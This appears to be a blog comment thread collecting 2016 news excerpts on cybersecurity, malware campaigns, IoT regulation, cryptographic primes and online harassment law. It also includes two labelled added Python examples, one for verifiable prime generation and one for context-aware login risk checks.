The most significant change is the problem of getting used to a new normal. In principle, most of us assume that the comments made from a Facebook account on a tabloid news story are given in good faith, and that online news publications follow good journalistic practice, for example with regard to checking sources. We find it difficult to understand that an entire online medium can be set up just to share such information, and that comments may be written for a monthly salary.
Although everyone has heard warnings about information warfare operations, governmental Internet troll factories and deliberate opinion manipulation, applying this knowledge to everyday situations on the network is difficult.
The English philosopher Thomas Hobbes formulated in his social philosophy the concept of the natural state of man, a war of all against all that exists before any social structures are formed. The concept of this thinker who lived three hundred years ago describes the current state of the Internet frighteningly well.
In building a network society, readiness and ability for source criticism are extremely important. Understanding the value of information and the harmfulness of misinformation is important at the individual level and also at the level of society as a whole.
Source: http://www.tivi.fi/blogit/ole-varuillasi-netissa-sotaa-kaydaan-paivittain-6589252
Tomi Engdahl says:
Spotify ads slipped malware onto PCs and Macs
New Spotify subscriber perk: No malware.
http://www.techhive.com/article/3128289/security/spotify-ads-slipped-malware-onto-pcs-and-macs.html
Spotify’s ads crossed from nuisance over to outright nasty this week, after the music service’s advertising started serving up malware to users on Wednesday. The malware was able to automatically launch browser tabs on Windows and Mac PCs, according to complaints that surfaced online.
As is typical for this kind of malware, the ads directed users’ browsers to other malware-containing sites in the hopes that someone would be duped into downloading more malicious software. The “malvertising” attack didn’t last long as Spotify was able to quickly correct the problem.
Spotify’s hardly the first tech company to get hit with malware in its ads. Google uncovered malware-loaded ads from an advertising partner in April 2015, and several days before that Yahoo announced it had removed malware from its advertising network.
you should also scan your PC with an anti-malware program such as Malwarebytes
https://www.malwarebytes.com/mwb-download/
Tomi Engdahl says:
Stickers emerge as EU’s weapon against dud IoT security
Whitegoods-inspired security rating scheme under discussion
http://www.theregister.co.uk/2016/10/10/eu_commission_preps_iot_security_privacy_rules/
The European Commission is readying a push to get companies to produce labels that reveal the security baked into internet-of-things things.
The labelling effort is part of a broader push to drive companies to better handle security controls and privacy data in the notoriously insecure and leaky devices.
Deputy head of cabinet Thibault Kleiner told Euractiv the Commission may push companies to develop labelling for secure internet-of-things devices.
The stickers plan is modelled on labels applied to white goods and other domestic appliances, as consumers apparently understand this kind of labelling.
The risk posed by sloppily-secured things was demonstrated neatly by a recent DDoS attack, rated the world’s largest to date, which emerged from a large internet of things botnet.
Commission plans cybersecurity rules for internet-connected machines
http://www.euractiv.com/section/innovation-industry/news/commission-plans-cybersecurity-rules-for-internet-connected-machines/
The European Commission is getting ready to propose new legislation to protect machines from cybersecurity breaches, signalling the executive’s growing interest in encouraging traditional European manufacturers to build more devices that are connected to the internet.
A new plan to overhaul EU telecoms law, which digital policy chiefs Günther Oettinger and Andrus Ansip presented three weeks ago, aims to speed up internet connections to meet the needs of big industries like car manufacturing and agriculture as they gradually use more internet functions.
But that transition to more and faster internet connections has caused many companies to worry that new products and industrial tools that rely on the internet will be more vulnerable to attacks from hackers.
EU lawmakers want to dispel those fears by creating rules that force companies to meet tough security standards and go through multi-pronged certification processes to guarantee privacy.
“That’s really a problem in the internet of things. It’s not enough to just look at one component. You need to look at the network, the cloud. You need a governance framework to get certification,”
Kleiner said the Commission would encourage companies to come up with a labelling system for internet-connected devices that are approved and secure.
There are currently around 6 billion internet-connected devices in use worldwide, and that figure is predicted to soar to over 20 billion by 2020, according to research by consultancy Gartner.
The internet of things is a catchphrase that has caught on with Brussels legislators and lobbyists, who use it to describe devices that haven’t used internet connection up until now—but will in the future, like connected cars that predict traffic or calculate ways to save fuel, or refrigerators that alert a person when they’re running out of food.
The EU labelling system that rates appliances based on how much energy they consume could be a template for the cybersecurity ratings: Kleiner pointed to that as “something I’d apply to the internet of things”.
Some hardware manufacturers are sceptical of the Commission’s plans to require certification for different parts of internet-connected devices and instead want hardware like SIM cards to be approved as security guarantees that can be used with appliances, Kleiner acknowledged.
Tomi Engdahl says:
Security bod to MSFT: PowerShell’s admin-lite scheme is an open door
Too much admin turns out to be barely enough
http://www.theregister.co.uk/2016/10/10/security_bod_to_microsoft_your_powershell_jea_feature_isnt_a_barrier_its_an_open_door/
Microsoft’s PowerShell feature “Just Enough Administration” (JEA) is, apparently, “way too much administration” according to researcher Matt Weeks.
In this write-up of JEA, root9B and Metasploit module developer Weeks says JEA profiles aren’t much of a barrier, since people with JEA profiles can escalate themselves to sysadmin status.
The idea with JEA is to provide granular administrative profile management – a good thing, if only it worked out that way.
By way of demonstration, Weeks provides a variety of examples in which capabilities in JEA are exploitable.
Weeks says Microsoft has promised to update its JEA documentation, making it clear that people with JEA profiles should be managed as closely as anybody else with administrative access.
Tomi Engdahl says:
Crypto needs more transparency, researchers warn
Publish primes with seeds, so we know there are no backdoors
http://www.theregister.co.uk/2016/10/09/crypto_needs_more_transparency_researchers_warn/
Researchers at the French Institute for Research in Computer Science and Automation (INRIA) and the University of Pennsylvania have called for security standards-setters to publish the seeds for the prime numbers on which their standards rely.
The boffins also demonstrated again that 1,024-bit primes can no longer be considered secure, by publishing an attack using “special number field sieve” (SNFS) mathematics to show that an attacker could create a prime that looks secure, but isn’t.
Since the research is bound to get conspiracists over-excited, it’s worth noting: their paper doesn’t claim that any of the cryptographic primes it mentions have been back-doored, only that they can no longer be considered secure.
“There are opaque, standardised 1024-bit and 2048-bit primes in wide use today that cannot be properly verified”, the paper states.
They call for 2,048-bit keys to be based on “standardised primes” using published seeds, because too many crypto schemes don’t provide any way to verify that the seeds aren’t somehow back-doored.
Examples of re-used primes in the paper include:
Many TLS implementations use some form of default, and as a result, “in May 2015, 56 per cent of HTTPS hosts selected one of the 10 most common 1024-bit groups when negotiating ephemeral Diffie-Hellman key exchange”;
In IPSec, “66 per cent of IKE responder hosts preferred the 1024-bit Oakley Group 2 over other choices” for their Diffie-Hellman exchange; and
OpenSSH implementations favour “a pre-generated list that is generally shipped with the software package”.
If any of the “hard-coded” primes were maliciously produced – something that’s happened before, for those who remember RSA’s NSA-funded Dual EC Deterministic Random Bit Generator – it would be hard to spot by looking at the numbers, but factorisation would be feasible.
Cryptology ePrint Archive: Report 2016/961
A kilobit hidden SNFS discrete logarithm computation
http://eprint.iacr.org/2016/961
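The verifiability the researchers ask for rests on a simple idea: if a prime is derived from a published seed by a public procedure, anyone can re-run the procedure and confirm the number was not hand-picked. This added example (not code from the paper or The Register) shows a constructed seed-to-prime derivation and the matching check; the SHA-256 expansion and counter scheme are an illustration of the principle, not any standard’s exact algorithm, and the seed value is made up.

```python
import hashlib
import secrets

# Added example: derive a prime from a published seed so a third party can
# re-run the derivation and confirm the prime carries no hidden structure.
# Constructed scheme (SHA-256 expansion + incrementing counter), not a standard.

SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47]


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Trial division by small primes, then Miller-Rabin with random bases."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    # write n - 1 as d * 2**r with d odd
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False          # a witness of compositeness was found
    return True


def candidate_from_seed(seed: bytes, bits: int, counter: int) -> int:
    """Expand SHA-256(seed || counter || block) into a `bits`-bit odd integer."""
    out = b""
    block = 0
    while len(out) * 8 < bits:
        out += hashlib.sha256(
            seed + counter.to_bytes(4, "big") + block.to_bytes(4, "big")
        ).digest()
        block += 1
    x = int.from_bytes(out, "big") >> (len(out) * 8 - bits)
    return x | (1 << (bits - 1)) | 1      # force exact bit length and oddness


def generate_verifiable_prime(seed: bytes, bits: int):
    """Return (p, counter): the first counter whose candidate is prime."""
    counter = 0
    while True:
        x = candidate_from_seed(seed, bits, counter)
        if is_probable_prime(x):
            return x, counter
        counter += 1


def verify_prime_derivation(seed: bytes, bits: int, counter: int, p: int) -> bool:
    """Re-run the public derivation: this counter must yield exactly p, p must be
    prime, and every earlier counter must have yielded a composite."""
    if candidate_from_seed(seed, bits, counter) != p or not is_probable_prime(p):
        return False
    return not any(
        is_probable_prime(candidate_from_seed(seed, bits, c)) for c in range(counter)
    )


if __name__ == "__main__":
    seed = b"example-seed-2016"        # constructed; a standard would publish its real seed
    p, ctr = generate_verifiable_prime(seed, 256)
    print(f"p = {p:#x}\ncounter = {ctr}")
    print("verifies:", verify_prime_derivation(seed, 256, ctr, p))
    print("tampered p+2 verifies:", verify_prime_derivation(seed, 256, ctr, p + 2))
```

A real Diffie-Hellman group would additionally require p to be a safe prime (p = 2q + 1 with q prime), which the same verifier would check in the same way; 256 bits is used here only to keep the run fast.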
Tomi Engdahl says:
CIA sees five days into the future
The US Central Intelligence Agency takes advantage of a wide range of information technology solutions in its work. By utilising massive data processing capacity, the CIA is able to predict things taking place in the real world several days in advance, the Defense One website reports.
The agency uses algorithms and analytics to predict smuggling and extremist activity. Machine learning allows public information and the CIA’s own secret information extracted from databases to be combined suitably. As a result, the CIA is able to predict the outbreak of social unrest up to five days before the actual events.
Source: http://www.tivi.fi/Kaikki_uutiset/cia-nakee-viisi-paivaa-tulevaisuuteen-6589084
More:
The CIA Says It Can Predict Social Unrest as Early as 3 to 5 Days Out
http://www.defenseone.com/technology/2016/10/cia-says-it-can-predict-social-unrest-early-3-5-days-out/132121/?oref=DefenseOneTCO
Tomi Engdahl says:
Why 2016 Is a Little Like 1984
http://www.eetimes.com/author.asp?section_id=36&doc_id=1330581&
The vision of artificial intelligence is becoming a reality in a different and more nuanced way than technologists once imagined.
Wafer-thin smartphones more powerful than a 486 PC are common, and everyone assumes they can connect to one big network that holds all the world’s information. It’s amazing, and a little scary.
At least for today, it turns out those intelligent agents people talked about are the products of a handful of companies that own giant collections of data centers. They include Apple, Amazon, Facebook, Google — and the world’s largest governments.
Most of the agents are what spy novels call double agents. They serve two masters — a consumer like you and me and their owner with the big data center.
Ostensibly the agents come free with an iPhone, a Facebook account or an Amazon Echo. Their real cost is they share their data with their vendor who resells it to his paying customers. As Peter Clarke, my colleague from EE Times Europe, puts it, “these days you are either selling or being sold.”
Few expected it would turn out this way. The visionaries weren’t predicting a World Wide Web, massively parallel distributed computing or the current kerosene — an emerging family of neural networking algorithms that run on those distributed data centers.
Today’s agents are still in their infancy.
So in 2016, the landscape seems set for a battle among a handful of intelligent agents poised to become giants. Consumers and OEMs need to decide carefully which they will partner with and on what terms.
Arguably science fiction writers like George Orwell saw this coming long before the PC arrived. It took folks like Edward Snowden to make it clear that 2016 is in a way 1984.
Tomi Engdahl says:
One U.S. Election-System Vendor Is Using Developers in Serbia
https://politics.slashdot.org/story/16/10/09/0020210/one-us-election-system-vendor-is-using-developers-in-serbia
The Open Source Election Technology Foundation is trying to move U.S. voting machines from “proprietary, vendor-owned systems to ones that are owned ‘by the people of the United States.’” But in the meantime, Slashdot reader dcblogs brings this report from ComputerWorld:
One major election technology company, Dominion Voting Systems, develops its systems in the U.S. and Canada but also has an office in Belgrade, Serbia. It was recently advertising openings for four senior software developers in Belgrade… Dominion said it takes measures “to ensure the accuracy, integrity and security of the software we create for our products….”
One election-system vendor uses developers in Serbia
Election-system development is not unlike other software development
http://www.computerworld.com/article/3126791/election-hacking/one-election-system-vendor-uses-developers-in-serbia.html
Voting machines are privately manufactured and developed and, as with other many other IT systems, the code is typically proprietary.
The use of proprietary systems in elections has its critics. One Silicon Valley group, the Open Source Election Technology Foundation, is pushing for an election system that shifts from proprietary, vendor-owned systems to one that is owned “by the people of the United States.”
But today, election system makers can operate in much the same manner as any vendor to build code; that includes using overseas developers.
One major election technology company, Dominion Voting Systems (DVS), develops its systems in the U.S. and Canada but also has an office in Belgrade, Serbia.
The software “is subjected to rigorous review, analysis, testing and certification by election authorities at the federal, state and local level, including the federal Election Assistance Commission,” said Riggall. Election system purchasing is managed by states and local governments. Once the code is certified, any changes require a new round of certification testing by election authorities, he said.
Paller said that “one shouldn’t feel complacent about maintaining software development and manufacturing all within the United States because foreign agencies have successfully placed technically competent spies on the payroll of American technology companies.”
Tomi Engdahl says:
Kelly Fiveash / Ars Technica UK:
UK targets internet trolls with new legal guidelines; those engaging in doxxing, baiting, derogatory hashtags, and virtual mobbing could face jail — Trolls who hurl abuse at others online using techniques such as doxxing, baiting, and virtual mobbing could face jail, the UK’s top prosecutor has warned.
UK’s chief troll hunter targets doxxing, virtual mobbing, and nasty images
Top prosecutor warns “ignorance isn’t a defence and perceived anonymity isn’t an escape.”
http://arstechnica.co.uk/tech-policy/2016/10/cps-guidelines-doxxing-virtual-mobbing-baiting/
Trolls who hurl abuse at others online using techniques such as doxxing, baiting, and virtual mobbing could face jail, the UK’s top prosecutor has warned.
New guidelines have been released by the Crown Prosecution Service to help cops in England and Wales determine whether charges—under part 2, section 44 of the 2007 Serious Crime Act—should be brought against people who use social media to encourage others to harass folk online.
http://www.legislation.gov.uk/ukpga/2007/27/section/44
Tomi Engdahl says:
Raphael Satter / Associated Press:
Yahoo disabled email forwarding feature at beginning of October, making it unnecessarily difficult for users to leave service amid coverage of record breach
Amid breach talk, some Yahoo users finding it hard to exit
http://hosted.ap.org/dynamic/stories/U/US_TEC_YAHOO_BREACH?SITE=AP&SECTION=HOME&TEMPLATE=DEFAULt
Tomi Engdahl says:
UK targets doxxing, hashtags and more in online troll crackdown
The Crown Prosecution Service gives prosecutors a better idea of what constitutes social media harassment.
https://www.engadget.com/2016/10/10/uk-government-cps-online-trolls/
Over the course of the year, the UK government has attempted to crack down on internet abuse by introducing new guidelines for prosecutors and forming a new troll-hunting police unit. Those updates ensured that anyone creating websites or fake online profiles with the intention to humiliate someone could be punished, but the Crown Prosecution Service (CPS) has today added a new list of offences aimed at bringing trolls to justice.
Prosecutors have been told that anyone indulging in “virtual mobbing” campaigns — where a person encourages others to target and abuse users on Twitter or Facebook — can now be charged under the Serious Crime Act 2007.
Tomi Engdahl says:
Verizon CEO dismisses report of $1bn discount on hacked Yahoo as ‘total speculation’
http://www.ibtimes.co.uk/verizon-ceo-dismisses-report-1bn-discount-hacked-yahoo-total-speculation-1585764?
Verizon CEO Lowell McAdam has dismissed reports regarding his company seeking to lower the price of Yahoo following the disclosure of the massive 2014 data breach, wherein 500 million user accounts were stolen.
McAdam also revealed that he was not shocked by the much-discussed hack that compromised sensitive user information including names, email addresses, phone numbers, birth dates and encrypted passwords of “at least” 500 million user accounts in late 2014.
“We all live in an internet world. It’s not a question of if you’re going to get hacked but when you are going to get hacked,” McAdam said.
“The industrial logic to doing this merger still makes a ton of sense,” he said. “I have spent a lot of time over the past weeks with folks from Yahoo and I am very impressed by their capability.”
Tomi Engdahl says:
Open Whisper Systems:
Signal adds self-destructing messages, safety numbers, and QR codes to verify end-to-end encryption between users, to iOS, Android, and desktop apps
Disappearing messages for Signal
https://whispersystems.org/blog/disappearing-messages/
The latest Signal release for iPhone, Android, and Desktop now includes support for disappearing messages.
With this update, any conversation can be configured to delete sent and received messages after a specified interval. The configuration applies to all parties of a conversation, and the clock starts ticking for each recipient once they’ve read their copy of the message.
Disappearing messages are a way for you and your friends to keep your message history tidy.
The disappearing timer values range from five seconds to one week,
This release also includes support for Signal Protocol’s numeric fingerprint format, which are called “safety numbers” in Signal.
Safety numbers can be verified by either scanning a QR code or by reading a string aloud.
As always, all of our code is free, open source, and available on GitHub.
https://github.com/whispersystems
Tomi Engdahl says:
Someone is pulling pages off Google with bogus defamation claims
http://www.theverge.com/2016/10/10/13234558/google-defamation-takedown-deindex-scam-reputation-management
Someone has perfected a playbook for pulling webpages off Google, according to a new post by UCLA lawyer Eugene Volokh. Volokh finds a series of unusual court cases that resulted in web pages being de-indexed by Google, making them unavailable to search or other services. In some cases, reputation management firms were apparently charging as much as $6,000 a month for the service.
Google will generally de-index pages if it receives a credible report that the page contains pirated content or defamatory statements. The reports are available in a public archive, and the vast majority of them concern pirated content. The standard for a successful request can be somewhat complex, but a legal injunction against the offending party is typically sufficient to de-index a site, making it effectively invisible to Google searches.
Volokh seems to have uncovered a way of gaming that system, giving bad actors the power to de-index any site they want. In the cases he describes, plaintiffs file lawsuits against dummy defendants who immediately agree to the proposed injunctions against them. The cases never see trial, and in many cases, the defendants themselves seem not to exist — but they exist long enough to get a court-approved injunction that can be sent to Google to de-index the site.
Dozens of suspicious court cases, with missing defendants, aim at getting web pages taken down or deindexed
https://www.washingtonpost.com/news/volokh-conspiracy/wp/2016/10/10/dozens-of-suspicious-court-cases-with-missing-defendants-aim-at-getting-web-pages-taken-down-or-deindexed/?postshare=6791476107006382&tid=ss_fb&utm_term=.2751668f1e23
Tomi Engdahl says:
US Military Is Looking At Blockchain Technology To Secure Nuclear Weapons
https://news.slashdot.org/story/16/10/11/2045240/us-military-is-looking-at-blockchain-technology-to-secure-nuclear-weapons
Blockchain technology has been slow to gain adoption in non-financial contexts, but it could turn out to have invaluable military applications. DARPA, the storied research unit of the U.S. Department of Defense, is currently funding efforts to find out if blockchains could help secure highly sensitive data, with potential applications for everything from nuclear weapons to military satellites.
Even the US military is looking at blockchain technology—to secure nuclear weapons
http://qz.com/801640/darpa-blockchain-a-blockchain-from-guardtime-is-being-verified-by-galois-under-a-government-contract/
Blockchain technology has been slow to gain adoption in non-financial contexts, but it could turn out to have invaluable military applications. DARPA, the storied research unit of the US Department of Defense, is currently funding efforts to find out if blockchains could help secure highly sensitive data, with potential applications for everything from nuclear weapons to military satellites.
The case for using a blockchain boils down to a concept in computer security known as “information integrity.” That’s basically being able to track when a system or piece of data has been viewed or modified. DARPA’s program manager behind the blockchain effort, Timothy Booher, offers this analogy: Instead of trying to make the walls of a castle as tall as possible to prevent an intruder from getting in, it’s more important to know if anyone has been inside the castle, and what they’re doing there.
A blockchain is a decentralized, immutable ledger. Blockchains can permanently log modifications to a network or database, preventing intruders from covering their tracks. In DARPA’s case, blockchain tech could offer crucial intelligence on whether a hacker has modified something in a database, or whether they’re surveilling a particular military system.
“Whenever weapons are employed … it tends to be a place where data integrity in general is incredibly important,” Booher says. “So nuclear command and control, satellite command and control, command and control in general, [information integrity] is very important.”
The prospect of the US military using a blockchain to secure critical data could spark a boom in uses of the technology outside finance. Investors poured $134 million into blockchain startups in the first quarter of 2016, according to research by trade publication CoinDesk. These firms have focused overwhelmingly on financial applications to date. But information security represents a huge new market for blockchain tech vendors, accounting for $75 billion in spending last year, and projected to hit $108 billion in 2019, according to forecasts by market research firm Gartner.
Tomi Engdahl says:
‘StrongPity’ malware infects users through illegitimate WinRAR and TrueCrypt installers
https://www.neowin.net/news/strongpity-malware-infects-users-through-legitimate-winrar-and-truecrypt-installers
A new strain of malware has been discovered by Kaspersky Labs, named ‘StrongPity,’ which targets users looking for two legitimate computer programs, WinRAR and TrueCrypt. WinRAR is a file archiver utility for Windows, which compresses and extracts files, while the latter is a discontinued encryption tool.
The malware contains components that not only has the ability to give attackers complete control on the victim’s computer, but also steal disk contents and download other software that the cybercriminals need. It was found that users in Italy and Belgium were affected the most, but there were also records found in Turkey, North Africa, and the Middle East.
To be able to gather victims, the attackers have built special fake websites that supposedly host the two programs.
Tomi Engdahl says:
Spy fraud
Taxpayers are paying intelligence contractors to browse Facebook, watch porn, and commit crimes
https://news.vice.com/story/us-taxpayers-are-paying-intelligence-contractors-to-browse-facebook-watch-porn-and-commit-crimes
When contractors and employees who work for America’s most powerful intelligence agencies get bored at work, they sometimes kill time by viewing pornography on their government computers, browsing online dating services, engaging in “sex chats” with minors, and playing games on Facebook.
And they charge U.S. taxpayers millions of dollars for it.
Tomi Engdahl says:
Insurance company realised: the old bag of tricks is no longer enough to secure information
The insurance company LähiTapiola has shifted the emphasis of its cyber security in a proactive direction. To this end, it has partnered with Nixu.
LähiTapiola is purposefully developing its security by moving the main focus of cyber security in its business to detection, analysis and a rapid, effective response to major threats.
“We have moved to a service provided by Nixu that allows control of security incidents from their observation onwards. It is the lifeblood of digitalised, networked and highly complex business environments,”
The companies signed a cooperation agreement, which includes the Nixu Cyber Defense Center (CDC) information security service.
Source: http://www.tivi.fi/Kaikki_uutiset/vakuutusyhtio-huomasi-vanhat-konstit-eivat-riita-enaa-tiedon-turvaamiseen-6589919
Tomi Engdahl says:
Burger barn put cloud on IT menu, burned out its developers
Move to the cloud and you may need ‘vendor managers’ and more governance
http://www.theregister.co.uk/2016/10/12/burger_barn_put_cloud_on_it_menu_burned_out_its_developers/
tale of replacing bespoke business applications with bits of Oracle’s cloud.* Doing so has made for interesting news on his sub-20 IT team, especially for the team of five developers. They’re on the way out because with the old code gone, the old coders can go too.
In their place, Nolte said he’ll hire “vendor managers,” people skilled in maintaining relationships with vendors, keeping contracts humming along nicely and negotiating for the new stuff that Hungry Jack’s needs. Nolte thinks some of his developers have the brains to make the jump to this new role, but not the proclivity. He characterised his developers as “fiddlers and tweakers” who are unlikely to abandon their coding careers.
Another quick lesson in Australian institutions: the nation’s dominant auto club is the National Roads and Motorists Association (NRMA)
Kotatko has just signed up for a marketing cloud and said one of the problems it has created is it’s too easy to run campaigns, because she and her team now have lots of data at their fingertips. She’s therefore been surprised at the amount of governance she has to do, lest marketers go wild with campaigns that target people from the wrong lists, breaching policy or good taste along the way.
No, software-as-a-service won’t automatically simplify operations and cut costs
Doing SaaS right needs at least half-a-dozen add-ons
http://www.theregister.co.uk/2016/10/11/no_softwareasaservice_wont_automatically_simplify_operations_and_cut_costs/
The Register has been asking around about what it takes to do SaaS right and has come to believe that among the tools you’ll probably need are:
Backup, which may seem an odd item on a SaaS shopping list given vendors’ promises of super-redundant data centres that never go down.
Data Loss Protection (DLP) Whether your data is on-premises or in a SaaS application, you need to make sure it can’t fall into the wrong hands. Most SaaS apps don’t have native DLP, the technology that monitors data to ensure sensitive material isn’t being e-mailed to unknown parties, saved onto removable storage media or otherwise exfiltrated. DLP’s become a standard issue on-premises security technology. It’s a no-brainer for SaaS users.
Context-aware security Imagine you work in London and that one afternoon, a few hours after you last logged in on a known good IP address, someone logs into your SaaS account from Eastern Europe with an unrecognised IP address.
Cloud Access Service Brokers (CASBs) Now imagine you use multiple SaaS applications and that the context-sensitive logon and DLP policy described above needs to be implemented in all of them.
Interconnect services Users hate even short delays when using software and that doesn’t change with SaaS. On your own networks, you can control the user experience. But SaaS nearly always has to traverse a big slab of the public internet … unless you pay for interconnect services that the likes of Equinix and Digital Realty offer to pave a fast lane between you and your preferred SaaS applications
Mobile device management A very good reason to adopt SaaS is that most applications are ready to roll on mobile devices from day one.
Will SaaS vendors explain this stuff?
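The “context-aware security” and CASB items above describe a check without showing one. The following is an added example, not code from The Register or any SaaS vendor: a login is compared with the user’s known-good IPs and with the time and place of the previous login, and an unrecognised IP or travel faster than an airliner triggers step-up authentication or a block. The GeoIP table, the 900 km/h threshold, the user names and the IP addresses are all constructed assumptions; a real deployment would query a GeoIP database and persist the per-user context.

```python
"""Context-aware login check for a SaaS account (added example, not from the article)."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from math import asin, cos, radians, sin, sqrt
from typing import List, Optional, Set, Tuple

# Constructed stand-in for a GeoIP lookup (assumption: production queries a GeoIP database).
GEO_TABLE = {
    ip_network("203.0.113.0/24"): ("GB", 51.5074, -0.1278),   # London
    ip_network("192.0.2.0/24"): ("GB", 52.4862, -1.8904),     # Birmingham
    ip_network("198.51.100.0/24"): ("UA", 50.4501, 30.5234),  # Kyiv
}
MAX_PLAUSIBLE_KMH = 900.0  # assumption: faster than an airliner between logins = impossible travel


def geolocate(ip: str) -> Optional[Tuple[str, float, float]]:
    addr = ip_address(ip)
    for net, loc in GEO_TABLE.items():
        if addr in net:
            return loc
    return None


def km_between(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in km (haversine)."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


@dataclass
class UserContext:
    known_ips: Set[str]
    last_login: Optional[datetime] = None
    last_geo: Optional[Tuple[str, float, float]] = None


def assess_login(ctx: UserContext, ip: str, when: datetime) -> Tuple[str, List[str]]:
    """Return ('allow' | 'step_up' | 'block', reasons). The caller records the login on success."""
    reasons: List[str] = []
    geo = geolocate(ip)
    if ip not in ctx.known_ips:
        reasons.append("unrecognised IP " + ip)
    if geo is None:
        reasons.append("no geolocation for IP")
        return "step_up", reasons
    if ctx.last_login is not None and ctx.last_geo is not None:
        hours = (when - ctx.last_login).total_seconds() / 3600.0
        dist = km_between(ctx.last_geo[1], ctx.last_geo[2], geo[1], geo[2])
        if geo[0] != ctx.last_geo[0]:
            reasons.append("country changed %s -> %s" % (ctx.last_geo[0], geo[0]))
        # speed implied by the two logins; a zero or negative gap with any distance is impossible
        speed = dist / hours if hours > 0 else (float("inf") if dist > 0 else 0.0)
        if speed > MAX_PLAUSIBLE_KMH:
            reasons.append("impossible travel: %.0f km in %.1f h" % (dist, hours))
            return "block", reasons
    return ("step_up" if reasons else "allow"), reasons


def record_login(ctx: UserContext, ip: str, when: datetime) -> None:
    """Update the context after a login that passed (including a successful step-up)."""
    ctx.known_ips.add(ip)
    ctx.last_login = when
    ctx.last_geo = geolocate(ip)


def demo() -> List[str]:
    """The scenario from the text: London at 14:00 from a known IP, then 'Eastern Europe' two hours later."""
    ctx = UserContext(known_ips={"203.0.113.10"})
    t0 = datetime(2016, 10, 11, 14, 0)
    verdicts = []
    v, _ = assess_login(ctx, "203.0.113.10", t0)
    verdicts.append(v)
    record_login(ctx, "203.0.113.10", t0)
    v, _ = assess_login(ctx, "198.51.100.23", t0 + timedelta(hours=2))  # Kyiv, unknown IP
    verdicts.append(v)
    v, _ = assess_login(ctx, "192.0.2.7", t0 + timedelta(hours=2))      # Birmingham, unknown IP
    verdicts.append(v)
    return verdicts  # ['allow', 'block', 'step_up']


if __name__ == "__main__":
    print(demo())
```

The Birmingham case shows why the two signals are separate: an unrecognised IP inside plausible travel range gets a step-up challenge, while the Kyiv login is blocked outright because no flight covers roughly 2,100 km in two hours. The CASB point in the article is that this same policy has to be applied to every SaaS application, which is exactly what a broker centralises.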
Tomi Engdahl says:
Firm Linked to Social Media Surveillance Loses Data Access
http://www.securityweek.com/firm-linked-social-media-surveillance-loses-data-access
Washington – Twitter and Facebook on Tuesday cut access to certain data for an analytics firm which according to a civil liberties group helped law enforcement track protesters in social movements.
The announcements came after the American Civil Liberties Union reported that the analytics firm Geofeedia had been marketing its services to local police agencies to help track activists using social media posts and location data.
Tomi Engdahl says:
G7 Boost Banking Cybersecurity as New SWIFT Threat Emerges
http://www.securityweek.com/g7-boost-banking-cybersecurity-new-swift-threat-emerges
The G7 group of leading economies laid out a new framework for battling the hacking of financial institutions Tuesday as a new threat using the SWIFT interbank network emerged.
Reacting to a rise in hacking incidents that have robbed banks of everything from client databases to hundreds of millions of dollars, the G7 group issued a set of principles for banks to implement cybersecurity programs.
“The recent incident involving the SWIFT network and other cyberattacks really underscore the imperative for robust cyber security throughout the global financial sector,” said US Treasury Deputy Secretary Sarah Bloom Raskin.
“These threats have not destabilized the financial sector but they threaten to destabilize it,” she said.
Raskin is co-chair of the Cyber Expert Group of the G7 — the United States, Canada, France, Germany, Italy, Japan, and the United Kingdom.
The two-page “Fundamental Elements of Cybersecurity” outlines the building blocks of an effective risk-based bank program to defend itself and the broader financial system from cyber threats.
The guidelines are aimed at public and private sector financial institution board members and top management to use for shaping and assessing their company’s cyber strategy.
The stunning theft earlier this year of $81 million from Bangladesh’s central bank drew attention to the vulnerabilities of financial sector institutions to cyber threats, especially those using the SWIFT worldwide network for interbank transfers.
“The challenge with cyber security is that the threat vectors can be difficult to discern and are constantly morphing in search of financial sector vulnerabilities,” said Raskin.
That issue was underscored Tuesday when computer security group Symantec issued a warning over a new malware threat to financial organizations called “Odinaff”.
Odinaff has been deployed widely around the world since January 2016 in attacks that “appear to be extremely focused on organizations operating in the banking, securities, trading, and payroll sectors,” it said.
New Trojan Used in Attacks Against SWIFT Member Banks
http://www.securityweek.com/new-trojan-used-attacks-against-swift-member-banks
A second hacking group has been targeting SWIFT banks, according to a new report from Symantec. The group is thought to be, or be linked to, Carbanak; and is not believed to have any direct connection to the Lazarus group thought to be behind the theft of $81 million from the Bangladesh central bank and attacks in Vietnam and Ecuador earlier this year.
The discovery comes with the analysis of a new trojan found to be infecting several Symantec customers. The trojan has been called Trojan.Odinaff. Symantec reports that it has been targeting “a number of financial organizations worldwide… focused on organizations operating in the banking, securities, trading, and payroll sectors.”
Tomi Engdahl says:
Preventing Account Creation Fraud with Two-Factor Authentication
http://www.securityweek.com/preventing-account-creation-fraud-two-factor-authentication
Recent reports of fraudulent account creation by employees at large banks to generate a boost in fees have raised many questions. How can such practices grow to such an immense scale? Wells Fargo has admitted to firing 5,300 employees for opening over 1.5 million unauthorized bank and credit card accounts. With allegations that the practice is more widespread, there is a real need to consider preventative measures.
How can an employee create fake accounts?
To address the question of consumer control, we must first consider how bank employees create fake accounts.
How much access should employees have?
This raises the question of the level of access that should be afforded to employees. Certainly there are legitimate reasons for employees to interact with customer accounts, but for an activity such as opening an account or transferring an entire balance, shouldn’t there be a higher bar for access?
Perhaps regulators need to consider mandating implementation of two-factor authentication (2FA) for significant account management activities. Only the account owner (or legal guardian/trustee) should be making these kinds of transactions, which aren’t an everyday occurrence.
How can 2FA be implemented for the masses in a cost-effective manner?
